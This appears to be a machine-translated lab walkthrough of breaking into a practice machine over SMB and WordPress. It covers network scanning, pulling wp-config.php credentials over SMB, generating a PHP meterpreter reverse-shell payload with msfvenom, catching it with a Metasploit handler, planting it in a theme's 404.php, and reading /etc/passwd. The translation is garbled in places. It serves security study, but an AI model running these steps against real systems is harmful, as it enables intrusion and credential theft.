SMB penetration of the learning process
1.SMB Introduction
SMB (stands for Server Message Block) protocol is a name that can be used to communicate information between a Web connection and client and server. SMB was originally IBM's Barry Feigenbaum (Barry Feigenbaum) developed, its purpose is to DOS operating system in the local file interface "Interrupt 13" reform for the Network File System.
Baidu Encyclopedia
ready condition: kali attack aircraft: 192.168.31.101
Range: 192.168.31.62
2. The detection process
(1) using a netdiscover -r 192.168.31.1/24(子网掩码)
probe into the LAN address range is: 192.168.31.62
(2) the use of nmap -sV 192.168.31.62(靶场地址)
detection range open service
nmap Detailed instructions
nmap -A -v -T4 192.168.31.62
for smb protocol vulnerability analysis: use smbclient -L 192.168.31.62
get deets.txt
to the desktop, then open another terminal, open deets.txt desktop
Viewwp-config.php
cd/wordpress
get wp-config.php
gedit wp-config.php
Try to connect using the mysql
mysql 192.168.31.62 -u Admin -p
password : 粘贴密码
ssh [email protected]
粘贴密码
Both approaches fail
Because of the open http protocol is used dirb http:192.168.31.62
to find the link and open wp-admin
login account using the password to open the link, the login is successful interface
Production webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=4444 -f raw
Replica generating code to local
gedit shell.php
启动监听
msfconsole
设置参数
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.31.101 (攻击机地址)
run
Successful start, waiting for the connection
to upload webshell Code
After submitting your browser and enter the access point
192.168.31.62/wordpress/wp-content/themes/twentyfifteen/404.php
connection succeeded:
cat /etc/passwd
Found togie user
to switch to togie user code is 12345
Elevate permissions
video tutorial link